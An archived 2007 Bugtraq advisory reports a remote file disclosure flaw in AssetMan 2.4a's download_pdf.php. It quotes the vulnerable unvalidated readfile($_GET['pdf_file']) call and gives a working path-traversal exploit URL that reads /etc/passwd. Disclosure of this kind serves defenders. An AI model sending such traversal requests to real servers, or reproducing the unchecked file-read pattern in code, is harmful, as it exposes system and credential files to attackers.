Bugtraq mailing list archives
AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
From: "BorN To K!LL BorN To K!LL" <q.t.i () hotmail com>
Date: Sun, 11 Mar 2007 22:50:16 +0300
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability | |Script: AssetMan | |Verson: 2.4a | |URL: http://www.bctree.com/~assetman/assetman-2.4a.zip | |Discover: BorN To K!LL | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |Bug in: |download_pdf.php | |Code: |readfile($_GET["pdf_file"]); | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |ExploiT: |~~~~~ |wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd | |+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |GreeTz 2: |Dr.2 - str0ke - AsbMay ..... | |KuW SeC .... AsbMay's Group .... | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= _________________________________________________________________Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Current thread:
- AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability BorN To K!LL BorN To K!LL (Mar 12)